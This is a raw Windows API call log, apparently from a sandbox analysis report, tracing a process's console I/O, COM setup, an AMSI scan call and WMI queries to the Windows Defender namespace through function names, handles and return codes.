hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.527] CoTaskMemFree (pv=0x1ad7bc60) [0312.527] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.527] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.529] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.531] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.531] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.531] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.532] GetConsoleOutputCP () returned 0x1b5 [0312.532] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.532] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.533] CoTaskMemFree (pv=0x1ad7bc60) [0312.533] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27fdde4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27fdde4*, lpNumberOfCharsWritten=0x1b83da58*=0x1) returned 1 [0312.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.534] GetConsoleOutputCP () returned 0x1b5 [0312.535] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.535] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.536] CoTaskMemFree (pv=0x1ad7bc60) [0312.536] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.536] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.536] GetConsoleOutputCP () returned 0x1b5 [0312.537] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.537] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.538] CoTaskMemFree (pv=0x1ad7bc60) [0312.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.538] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.539] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.539] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.540] GetConsoleOutputCP () returned 0x1b5 [0312.540] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.540] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.541] CoTaskMemFree (pv=0x1ad7bc60) [0312.541] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.542] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.542] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.543] GetConsoleOutputCP () returned 0x1b5 [0312.544] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.544] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.545] CoTaskMemFree (pv=0x1ad7bc60) [0312.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.549] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.621] GetConsoleOutputCP () returned 0x1b5 [0312.688] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.688] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.689] CoTaskMemFree (pv=0x1ad7bc60) [0312.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83e018 | out: lpConsoleScreenBufferInfo=0x1b83e018) returned 1 [0312.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83e018 | out: lpConsoleScreenBufferInfo=0x1b83e018) returned 1 [0312.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dfe8 | out: lpConsoleScreenBufferInfo=0x1b83dfe8) returned 1 [0312.691] GetConsoleOutputCP () returned 0x1b5 [0312.691] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.691] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83de70 | out: lpWriteRegion=0x1b83de70) returned 1 [0312.692] CoTaskMemFree (pv=0x1ad7bc60) [0312.693] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b83e140*=0x348, lpdwindex=0x1b83df24 | out: lpdwindex=0x1b83df24) returned 0x0 [0312.693] EtwEventActivityIdControl () returned 0x0 [0312.693] EtwEventActivityIdControl () returned 0x0 [0312.694] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b83e5c0*=0x348, lpdwindex=0x1b83e3a4 | out: lpdwindex=0x1b83e3a4) returned 0x0 [0312.694] CloseHandle (hObject=0x348) returned 1 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.696] EtwEventActivityIdControl () returned 0x0 [0312.697] SetEvent (hEvent=0x6f4) returned 1 [0312.697] SetEvent (hEvent=0x6e8) returned 1 [0312.697] SetEvent (hEvent=0x6ec) returned 1 [0312.697] SetEvent (hEvent=0x6f0) returned 1 [0312.697] SetEvent (hEvent=0x704) returned 1 [0312.698] SetEvent (hEvent=0x6f8) returned 1 [0312.698] SetEvent (hEvent=0x6fc) returned 1 [0312.698] SetEvent (hEvent=0x700) returned 1 [0312.698] SetEvent (hEvent=0x708) returned 1 [0312.701] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b83f0a0*=0x710, lpdwindex=0x1b83ee84 | out: lpdwindex=0x1b83ee84) returned 0x0 [0312.701] SetThreadUILanguage (LangId=0x0) returned 0x409 [0312.704] CoCreateGuid (in: pguid=0x1b83ef98 | out: pguid=0x1b83ef98*(Data1=0x6080a202, Data2=0x2d3f, Data3=0x4e54, Data4=([0]=0xb8, [1]=0x97, [2]=0x27, [3]=0x9b, [4]=0x55, [5]=0x7f, [6]=0x56, [7]=0x51))) returned 0x0 [0312.704] AmsiOpenSession () returned 0x0 [0312.704] AmsiScanBuffer () returned 0x80070015 [0312.706] EtwEventActivityIdControl () returned 0x0 [0312.706] EtwEventActivityIdControl () returned 0x0 [0312.706] EtwEventActivityIdControl () returned 0x0 [0312.707] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x1b83e6f0*=0x5c8, lpdwindex=0x1b83e4e4 | out: lpdwindex=0x1b83e4e4) returned 0x0 [0312.707] SetEvent (hEvent=0x24c) returned 1 [0312.707] SetEvent (hEvent=0x5c8) returned 1 [0312.708] EtwEventActivityIdControl () returned 0x0 [0312.708] SetEvent (hEvent=0x888) returned 1 [0312.708] SetEvent (hEvent=0x24c) returned 1 [0312.708] SetEvent (hEvent=0x5c8) returned 1 [0312.708] SetEvent (hEvent=0x898) returned 1 [0312.708] SetEvent (hEvent=0x88c) returned 1 [0312.708] SetEvent (hEvent=0x890) returned 1 [0312.708] SetEvent (hEvent=0x894) returned 1 [0312.708] SetEvent (hEvent=0x89c) returned 1 [0312.716] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b83f0a0*=0x710, lpdwindex=0x1b83ee84 | out: lpdwindex=0x1b83ee84) returned 0x0 [0312.780] CoGetContextToken (in: pToken=0x1b83f930 | out: pToken=0x1b83f930) returned 0x0 [0312.781] CoUninitialize () Thread: id = 240 os_tid = 0x1558 Thread: id = 241 os_tid = 0x910 [0263.042] CoGetContextToken (in: pToken=0x1b87fdd0 | out: pToken=0x1b87fdd0) returned 0x0 [0263.042] CObjectContext::QueryInterface () returned 0x0 [0263.042] CObjectContext::GetCurrentThreadType () returned 0x0 [0263.042] Release () returned 0x0 [0263.042] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0263.042] RoInitialize () returned 0x1 [0263.042] RoUninitialize () returned 0x0 Thread: id = 242 os_tid = 0xd1c [0264.816] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0264.817] CoGetContextToken (in: pToken=0x1b8ff920 | out: pToken=0x1b8ff920) returned 0x0 [0264.817] CObjectContext::QueryInterface () returned 0x0 [0264.817] CObjectContext::GetCurrentThreadType () returned 0x0 [0264.817] Release () returned 0x0 [0264.817] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0264.817] CoUninitialize () [0264.817] RoInitialize () returned 0x1 [0264.817] RoUninitialize () returned 0x0 [0288.269] malloc (_Size=0x8) returned 0x818fd0 [0288.270] LocalAlloc (uFlags=0x0, uBytes=0xa6) returned 0x1a8e48a0 [0288.271] LocalFree (hMem=0x1a8e48a0) returned 0x0 [0288.271] free (_Block=0x818fd0) [0288.271] malloc (_Size=0x8) returned 0x818f20 [0288.271] LocalAlloc (uFlags=0x0, uBytes=0xa6) returned 0x1ad1ffd0 [0288.272] LocalFree (hMem=0x1ad1ffd0) returned 0x0 [0288.272] free (_Block=0x818f20) [0288.273] malloc (_Size=0x8) returned 0x818fc0 [0288.273] LocalAlloc (uFlags=0x0, uBytes=0xa6) returned 0x1ad1fb00 [0288.289] LocalFree (hMem=0x1ad1fb00) returned 0x0 [0288.289] free (_Block=0x818fc0) [0288.362] CoCreateGuid (in: pguid=0x1b8fcb78 | out: pguid=0x1b8fcb78*(Data1=0x4ecd2b9c, Data2=0x5dbd, Data3=0x4dc4, Data4=([0]=0x81, [1]=0xde, [2]=0x7c, [3]=0x57, [4]=0xf4, [5]=0x7b, [6]=0xbb, [7]=0x95))) returned 0x0 [0288.457] CoTaskMemAlloc (cb=0x1c) returned 0x1ace6300 [0288.458] CoTaskMemFree (pv=0x1ace6300) [0288.480] malloc (_Size=0x18) returned 0x818cd0 [0288.502] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a8f5930 [0288.502] LocalFree (hMem=0x1a8f5930) returned 0x0 [0288.502] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a8f5a80 [0288.599] LocalFree (hMem=0x1a8f5a80) returned 0x0 [0288.601] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a8f5a80 [0288.601] LocalFree (hMem=0x1a8f5a80) returned 0x0 [0288.601] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a8f5a80 [0288.601] LocalFree (hMem=0x1a8f5a80) returned 0x0 [0288.601] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1ace5e20 [0288.602] LocalFree (hMem=0x1ace5e20) returned 0x0 [0288.602] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1ace60f0 [0288.602] LocalFree (hMem=0x1ace60f0) returned 0x0 [0288.643] malloc (_Size=0x120) returned 0x1aa11e00 [0288.644] MI_OperationWrapper_Initialize () returned 0x0 [0288.644] GetAddr_OperationCallbacks_NativeInstanceCallback () returned 0x7fffbb531ad0 [0288.646] GetAddr_OperationCallbacks_NativeStreamedParameterResultCallback () returned 0x7fffbb531b80 [0288.646] GetAddr_OperationCallbacks_NativeWriteMessageCallback () returned 0x7fffbb531be0 [0288.646] GetAddr_OperationCallbacks_NativeWriteProgressCallback () returned 0x7fffbb531c20 [0288.647] GetAddr_OperationCallbacks_NativeWriteErrorCallback () returned 0x7fffbb531c80 [0288.647] GetAddr_OperationCallbacks_NativePromptUserCallback () returned 0x7fffbb531ce0 [0288.648] MI_OperationWrapper_SetupDrainingIfNeeded () returned 0x0 [0288.648] GetProcessHeap () returned 0x530000 [0288.648] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ace6090 [0288.648] OperationOptions_Create () returned 0x0 [0288.651] wcscmp (_String1="__MI_OPERATIONOPTIONS_WRITEERRORMODE", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned 1 [0288.655] wcscmp (_String1="__MI_OPERATIONOPTIONS_WRITEERRORMODE", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned 1 [0288.655] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODEREGULAR_ACKVALUE", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned -1 [0288.655] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODEREGULAR_ACKVALUE", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned -1 [0288.655] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODE", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned -1 [0288.655] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODE", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned -1 [0288.655] wcscmp (_String1="__MI_OPERATIONOPTIONS_IMPROVEDPERF_STREAMING", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned -1 [0288.655] wcscmp (_String1="__MI_OPERATIONOPTIONS_IMPROVEDPERF_STREAMING", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned -1 [0288.658] PublishDebugMessage () returned 0x1 [0288.658] GetProcessHeap () returned 0x530000 [0288.658] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x24) returned 0x1ace6300 [0288.658] memcpy (in: _Dst=0x1ace6300, _Src=0x277006c, _Size=0x24 | out: _Dst=0x1ace6300) returned 0x1ace6300 [0288.658] GetProcessHeap () returned 0x530000 [0288.658] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8) returned 0x1a8f58c0 [0288.658] memcpy (in: _Dst=0x1a8f58c0, _Src=0x2597474, _Size=0x8 | out: _Dst=0x1a8f58c0) returned 0x1a8f58c0 [0288.658] PublishDebugMessage () returned 0x1 [0288.658] GetProcessHeap () returned 0x530000 [0288.658] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1d8) returned 0x1a81aaf0 [0288.658] ??0DynamicSchema@@QEAA@XZ () returned 0x1a81acb8 [0288.659] GetCorrelationId () returned 0x0 [0288.663] CreateThreadpoolWork (in: pfnwk=0x7fffbdc39d10, pv=0x1a81aaf0, pcbe=0x0 | out: pv=0x1a81aaf0) returned 0x1a85da70 [0288.663] GetProcessHeap () returned 0x530000 [0288.663] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1a86f620 [0288.663] memcpy (in: _Dst=0x1a86f620, _Src=0x276ff7c, _Size=0x40 | out: _Dst=0x1a86f620) returned 0x1a86f620 [0288.663] GetTickCount64 () returned 0x123ccce [0288.663] GetProcessHeap () returned 0x530000 [0288.663] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace7230 [0288.663] PublishDebugMessage () returned 0x1 [0288.663] TpPostWork () returned 0x3 [0288.663] PublishDebugMessage () returned 0x1 Thread: id = 243 os_tid = 0x894 Thread: id = 244 os_tid = 0xf90 Thread: id = 245 os_tid = 0xf94 Thread: id = 248 os_tid = 0x680 Thread: id = 249 os_tid = 0xee8 [0292.000] GetCurrentThreadId () returned 0xee8 [0292.000] GetProcessHeap () returned 0x530000 [0292.000] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ad573c0 [0292.000] WMIExtendedObjectToInstance () returned 0x0 [0292.001] _wcsicmp (_String1="MSFT_WmiError", _String2="CIM_Error") returned 10 [0292.001] _wcsicmp (_String1="MSFT_WmiError", _String2="__Parameters") returned 14 [0292.001] _wcsicmp (_String1="MSFT_WmiError", _String2="__ExtendedStatus") returned 14 [0292.001] ?GetMiClass@DynamicSchema@@UEAAJPEBG00PEAPEBU_MI_Class@@@Z () returned 0x80041002 [0292.001] ClassCache_GetClass () returned 0x6 [0292.001] ResultToHRESULT () returned 0x80041002 [0292.001] GetCurrentThreadId () returned 0xee8 [0292.001] PublishDebugMessage () returned 0x1 [0292.001] WbemLocator:IUnknown:AddRef (This=0x1ace6bd0) returned 0x2 [0292.001] GetProcessHeap () returned 0x530000 [0292.002] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1ad52fb0 [0292.002] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0292.002] _vsnwprintf (in: _Buffer=0x1b97db78, _BufferCount=0x9, _Format="MS_%x", _ArgList=0x1b97da58 | out: _Buffer="MS_409") returned 6 [0292.002] SetThreadToken (Thread=0x0, Token=0x7f0) returned 1 [0292.002] GetCurrentThreadId () returned 0xee8 [0292.002] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ace6bd0, strNetworkResource="root/Microsoft/Windows/Defender", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1b97dad8 | out: ppNamespace=0x1b97dad8*=0x618720) returned 0x0 [0292.066] CoSetProxyBlanket (pProxy=0x618720, dwAuthnSvc=0xffffffff, dwAuthzSvc=0xffffffff, pServerPrincName=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x40) returned 0x0 [0292.066] GetProcessHeap () returned 0x530000 [0292.066] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1ad527e0 [0292.066] GetProcessHeap () returned 0x530000 [0292.066] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x30) returned 0x1ad4f660 [0292.066] WbemLocator:IUnknown:AddRef (This=0x618720) returned 0x2 [0292.066] GetProcessHeap () returned 0x530000 [0292.067] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad52fb0) returned 1 [0292.068] PublishDebugMessage () returned 0x1 [0292.068] WbemLocator:IUnknown:Release (This=0x1ace6bd0) returned 0x1 [0292.068] GetProcessHeap () returned 0x530000 [0292.068] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace88b0 [0292.068] IWbemServices:GetObject (in: This=0x618720, strObjectPath="MSFT_WmiError", lFlags=0, pCtx=0x1a866580, ppObject=0x1b97dc28*=0x0, ppCallResult=0x0 | out: ppObject=0x1b97dc28*=0x1ad49630, ppCallResult=0x0) returned 0x0 [0292.080] GetProcessHeap () returned 0x530000 [0292.080] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace88b0) returned 1 [0292.080] IWbemClassObject:Get (in: This=0x1ad49630, wszName="__CLASS", lFlags=0, pVal=0x1b97db88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b97db88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_WmiError", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0292.080] IWbemClassObject:Get (in: This=0x1ad49630, wszName="__NAMESPACE", lFlags=0, pVal=0x1b97db58*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b97db58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\Microsoft\\Windows\\Defender", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0292.080] IWbemClassObject:Get (in: This=0x1ad49630, wszName="__SUPERCLASS", lFlags=0, pVal=0x1b97db70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b97db70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Error", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0292.080] ?GetMiClass@DynamicSchema@@UEAAJPEBG00PEAPEBU_MI_Class@@@Z () returned 0x80041002 [0292.080] ClassCache_GetClass () returned 0x6 [0292.080] ResultToHRESULT () returned 0x80041002 [0292.080] GetCurrentThreadId () returned 0xee8 [0292.080] PublishDebugMessage () returned 0x1 [0292.080] WbemLocator:IUnknown:AddRef (This=0x1ace6bd0) returned 0x2 [0292.080] GetProcessHeap () returned 0x530000 [0292.081] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1ad529c0 [0292.081] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="ROOT/Microsoft/Windows/Defender") returned 0 [0292.081] _wcsicmp (_String1="ROOT/Microsoft/Windows/Defender", _String2="root/Microsoft/Windows/Defender") returned 0 [0292.081] WbemLocator:IUnknown:AddRef (This=0x618720) returned 0x3 [0292.081] GetProcessHeap () returned 0x530000 [0292.081] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad529c0) returned 1 [0292.081] PublishDebugMessage () returned 0x1 [0292.081] WbemLocator:IUnknown:Release (This=0x1ace6bd0) returned 0x1 [0292.081] GetProcessHeap () returned 0x530000 [0292.081] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace88b0 [0292.081] IWbemServices:GetObject (in: This=0x618720, strObjectPath="CIM_Error", lFlags=0, pCtx=0x1a866580, ppObject=0x1b97da98*=0x0, ppCallResult=0x0 | out: ppObject=0x1b97da98*=0x1ad499a0, ppCallResult=0x0) returned 0x0 [0292.089] GetProcessHeap () returned 0x530000 [0292.090] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace88b0) returned 1 [0292.090] IWbemClassObject:Get (in: This=0x1ad499a0, wszName="__CLASS", lFlags=0, pVal=0x1b97d9f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b97d9f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Error", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0292.090] IWbemClassObject:Get (in: This=0x1ad499a0, wszName="__NAMESPACE", lFlags=0, pVal=0x1b97d9c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b97d9c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\Microsoft\\Windows\\Defender", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0292.090] IWbemClassObject:Get (in: This=0x1ad499a0, wszName="__SUPERCLASS", lFlags=0, pVal=0x1b97d9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b97d9e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0292.090] WMIObjectToClass () returned 0x0 [0292.095] ResultToHRESULT () returned 0x0 [0292.095] ClassCache_AddClass () returned 0x0 [0292.095] ResultToHRESULT () returned 0x0 [0292.095] WbemLocator:IUnknown:Release (This=0x618720) returned 0x2 [0292.095] IUnknown:Release (This=0x1ad499a0) returned 0x0 [0292.095] WMIObjectToClass () returned 0x0 [0292.097] ResultToHRESULT () returned 0x0 [0292.097] ClassCache_AddClass () returned 0x0 [0292.097] ResultToHRESULT () returned 0x0 [0292.097] WbemLocator:IUnknown:Release (This=0x618720) returned 0x1 [0292.097] IUnknown:Release (This=0x1ad49630) returned 0x0 [0292.097] Instance_New () returned 0x0 [0292.097] ResultToHRESULT () returned 0x0 [0292.097] ResultToHRESULT () returned 0x0 [0292.265] RtlInterlockedWakeAll () returned 0x0 [0292.265] GetCurrentThreadId () returned 0xee8 [0292.265] GetProcessHeap () returned 0x530000 [0292.266] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad573c0) returned 1 [0292.266] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0292.266] PublishDebugMessage () returned 0x1 [0292.937] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc42060, phModule=0x1b97fbe8 | out: phModule=0x1b97fbe8*=0x7fffbdc30000) returned 1 [0292.937] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0292.937] PublishDebugMessage () returned 0x1 [0292.937] TpWaitForWork () returned 0x0 [0292.938] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc39d10, phModule=0x1b97fbe8 | out: phModule=0x1b97fbe8*=0x7fffbdc30000) returned 1 [0292.938] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0292.938] PublishDebugMessage () returned 0x1 [0292.938] GetCurrentThreadId () returned 0xee8 [0292.938] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0292.938] GetCurrentThreadId () returned 0xee8 [0292.938] GetProcessHeap () returned 0x530000 [0292.938] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ad57330 [0292.938] PublishDebugMessage () returned 0x1 [0292.938] 